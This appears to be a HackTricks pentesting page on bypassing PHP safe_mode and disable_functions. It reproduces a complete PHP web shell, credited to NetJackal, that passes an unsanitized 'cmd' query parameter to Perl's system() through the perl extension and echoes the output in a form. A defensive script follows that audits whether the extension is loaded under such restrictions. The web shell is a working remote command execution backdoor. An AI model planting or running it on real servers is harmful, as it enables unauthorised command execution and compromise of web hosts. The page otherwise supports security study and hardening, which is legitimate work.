tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

PHP Perl Extension Safe_mode Bypass Exploit

From http://blog.safebuff.com/2016/05/06/disable-functions-bypass/

```php
<?php
#########################################################
##----------------------------------------------------###
##----PHP Perl Extension Safe_mode Bypass Exploit-----###
##----------------------------------------------------###
##-Author:--NetJackal---------------------------------###
##-Email:---nima_501[at]yahoo[dot]com-----------------###
##-Website:-http://netjackal.by.ru--------------------###
##----------------------------------------------------###
#########################################################
// The script only works when the perl extension is loaded.
if(!extension_loaded('perl'))die('perl extension is not loaded');
// Fallback for very old PHP versions without the $_GET superglobal.
if(!isset($_GET))$_GET=&$HTTP_GET_VARS;
// Default command: directory listing for the detected OS.
if(empty($_GET['cmd']))$_GET['cmd']=(strtoupper(substr(PHP_OS,0,3))=='WIN')?'dir':'ls';
$perl=new perl();
echo "<textarea rows='25' cols='75'>";
// The command runs through Perl's system(), not PHP's own exec functions.
$perl->eval("system('".$_GET['cmd']."')");
echo "</textarea>";
$_GET['cmd']=htmlspecialchars($_GET['cmd']);
echo "<br><form>CMD: <input type=text name=cmd value='".$_GET['cmd']."' size=25></form>"
?>
```
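The script above depends on one condition: the `perl` extension being loaded in a runtime that is otherwise restricted. The following audit check is an added example, not part of the original page or of the referenced blog post; the function names `ini_list` and `audit_perl_extension` and the report keys are hypothetical.

```php
<?php
// Added example: reports whether this PHP runtime loads the perl extension
// alongside safe_mode / disable_functions restrictions.

function ini_list($name)
{
    // ini_get() returns false for unknown directives; the cast turns that into ''.
    $raw = (string) ini_get($name);
    return array_values(array_filter(array_map('trim', explode(',', $raw)), 'strlen'));
}

function audit_perl_extension()
{
    $report = array(
        'perl_loaded'        => extension_loaded('perl'),
        'perl_class'         => class_exists('perl', false),
        'disabled_functions' => ini_list('disable_functions'),
        // safe_mode was removed in PHP 5.4; a missing directive counts as off.
        'safe_mode'          => filter_var(ini_get('safe_mode'), FILTER_VALIDATE_BOOLEAN),
        'ini_files'          => array(),
        'finding'            => 'OK: perl extension is not loaded',
    );

    // Configuration files to inspect for the extension= line that loads perl.
    $files = array_filter(array(php_ini_loaded_file()));
    $scanned = php_ini_scanned_files();
    if ($scanned) {
        $files = array_merge($files, array_map('trim', explode(',', $scanned)));
    }
    $report['ini_files'] = array_values($files);

    $restricted = $report['safe_mode'] || count($report['disabled_functions']) > 0;
    if ($report['perl_loaded'] && $restricted) {
        $report['finding'] = 'FAIL: perl extension is loaded; the configured '
            . 'restrictions do not apply to commands run through it';
    } elseif ($report['perl_loaded']) {
        $report['finding'] = 'WARN: perl extension is loaded; remove it unless '
            . 'the application needs it';
    }
    return $report;
}

print_r(audit_perl_extension());
```

Run it under the same SAPI as the application (for example by requesting it through the web server), because the CLI often loads a different `php.ini` and a different set of extensions.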
